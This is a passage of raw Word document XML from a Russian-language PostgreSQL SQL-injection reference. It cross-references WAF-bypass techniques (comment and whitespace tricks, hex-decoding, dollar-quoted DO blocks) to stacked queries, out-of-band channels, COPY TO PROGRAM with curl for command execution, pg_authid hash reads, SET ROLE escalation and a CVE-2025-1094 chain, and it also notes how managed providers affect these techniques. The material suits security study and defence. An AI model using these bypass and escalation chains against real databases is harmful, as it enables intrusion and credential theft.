      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy (SQLi cheat sheet — encoding bypass, whitespace bypass), HackTricks PostgreSQL Injection (encoding tricks), OWASP SQL Injection Bypassing WAF (general WAF bypass catalogue), PostgreSQL Lexical Structure §4.1 (комментарии, whitespace, case-rules, Unicode-escape, dollar-quoting, E-strings — </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>все 3.9-разделы лексически базируются на этом документе), SQL:2003 §5.3 (Unicode delimiter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8DF6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34602DB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.1 Payload B (DO-блок) — основной приём обхода extended-protocol ограничения на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-stacking. 3.9.6 Payload A/B (whitespace через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или tab) применим, когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тоже фильтруется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'\s*;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — alternative-whitespace проталкивает stacked queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C6AC81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.x (OOB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.1/3.9.2/3.9.5 — основные обходные техники для доставки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через WAF-блоки на имена опасных функций. 3.6 без 3.9 в большинстве реальных WAF-окружений не проходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4C7B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 (COPY FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после прохода 3.9.5 (decode hex для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... TO PROGRAM 'curl ...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — RCE без подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload-тексте. 3.9.7 + 3.7.1 — chain CVE-2025-1094 → COPY TO PROGRAM (R21).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FDFB04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3 (pg_authid / pg_shadow)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.5 Payload C с hex-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT rolpassword FROM pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — типичный сценарий чтения хешей после получения SUPERUSER через 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B938BE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 (data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.1 (dollar-quote) + 3.10.1 — CTE с INSERT/UPDATE в SELECT-эндпоинте, обёрнутая в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ ... END $$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для обхода stacked-protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A6F96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12 (Комментарии и edge cases)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пограничные случаи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C47AB88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.9.6 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как whitespace) vs 3.12.1 (вложенные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атака на парсер комментариев) — закреплено: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для обхода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s+</w:t>
      </w:r>
      <w:r>
        <w:t>-фильтра — в 3.9.6; nested-comments — в 3.12.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C3250" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.9.6 Payload B (CR как разделитель токенов) vs 3.12.2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и CRLF — атака на парсер однострочного комментария) — близко, но разные цели.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1172D97E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.5 + EXECUTE в DO для построения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE postgres; ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload-тексте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E739D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.5 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode + convert_from + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — наиболее компактный путь обойти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-валидацию (3.16.2). 3.9.6 case-mix — нагрузка на семантику unquoted identifier-ов: PG приводит к lower-case, поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pG_AuThId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"pG_AuThId"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"pg_authid"</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B763AC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (Хронология 2025)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — полный разбор CVE-2025-1094: CVSS 8.1, цепочка с CVE-2024-12356 (BeyondTrust), Rapid7 disclosure, patch-окно 13 февраля 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B8ED88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.7 (Цепочки)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-1094 + COPY TO PROGRAM (R21) — двухступенчатый exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D5811" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 (Конфиги PostgreSQL)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>standard_conforming_strings = on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт PG 9.1+) — необходимое условие, чтобы обычные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-литералы не превращались в E-string-семантику; если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:t>, 3.9.4 escape применяется и к не-E литералам, что радикально расширяет поверхность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A85FF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 (Дополнительные приёмы валидации)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практический ответ на 3.9: параметризация (где работает), AST-валидация payload-ов, whitelist по конечному набору значений для ORDER BY / LIMIT — там, где параметризация не помогает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B764DC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492132D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.9 — это категория про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-layer фильтрацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: WAF (Cloudflare, AWS WAF, ModSecurity на API gateway), sanitizer-функции в коде приложения, blacklist на REST-параметрах. Managed-PG (AWS RDS, Google Cloud SQL, Supabase) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не предоставляет input-WAF для SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — он живёт перед бэкендом приложения, не перед PG. Поэтому 3.9 целиком ортогонален managed-PG: приёмы работают идентично self-hosted, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсер PG один и тот же</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F65706" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Нюансы по компонентам managed-стэка:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F756B6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PgBouncer / RDS Proxy / Cloud SQL Auth Proxy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — connection-poolers, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Они не парсят SQL (PgBouncer transaction-mode максимум смотрит на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COMMIT</w:t>
      </w:r>
      <w:r>
        <w:t>-границы для пула; RDS Proxy и Cloud SQL Auth Proxy — на auth и TLS-уровне). Payload проходит через них байт-в-байт. 3.9 на них никак не влияет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A72452" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase PostgREST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — REST → SQL генератор, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не WAF</w:t>
      </w:r>
      <w:r>
        <w:t>. Ограничивает поверхность атаки тем, что user-input не идёт в raw SQL — PostgREST строит запрос из DSL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?column=eq.value</w:t>
      </w:r>
      <w:r>
        <w:t>). 3.9 неприменим к PostgREST-эндпоинтам как класс (нет raw-SQL builder-а). Применимо только к custom RPC-функциям с динамическим SQL внутри plpgsql (там — см. 3.16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55290AAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase Database Functions / RDS / Cloud SQL custom extensions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если приложение использует raw SQL внутри plpgsql-функций (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t>), 3.9 применим к ним так же, как к application-коду.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B3AC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed-providers с `standard_conforming_strings = off`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — теоретический вектор для 3.9.4 (backslash-escape применяется к обычным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-литералам). На современных managed-инстансах (RDS PG 13+, Cloud SQL PG 13+, Supabase) дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Кластеры с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти исключительно legacy RDS PG 9.x, которые на момент 2026 EOL и за пределами поддерживаемого периода. Перед атакой проверяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHOW standard_conforming_strings;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PUBLIC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5259E8E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF managed-провайдеров</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (AWS WAF managed rule groups, Cloud Armor SQL injection ruleset) — это application-layer перед бэкендом, не PG-провайдер сам по себе. Их сигнатуры калибруются отдельно; общие принципы 3.9 применимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E482015" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Итого: для managed-PG в контексте 3.9 ничего специфичного — приёмы работают одинаково, провайдер не вмешивается в лексер. Внимание стоит уделить только проверке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>standard_conforming_strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на legacy-кластерах (актуально для 3.9.4) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHOW server_version_num</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для проверки patch-окна 3.9.7 (CVE-2025-1094) на тех машинах, где запущен psql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003BABF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.10.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FE130" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.10 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTE-based атаки и побочные эффекты</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: использование конструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
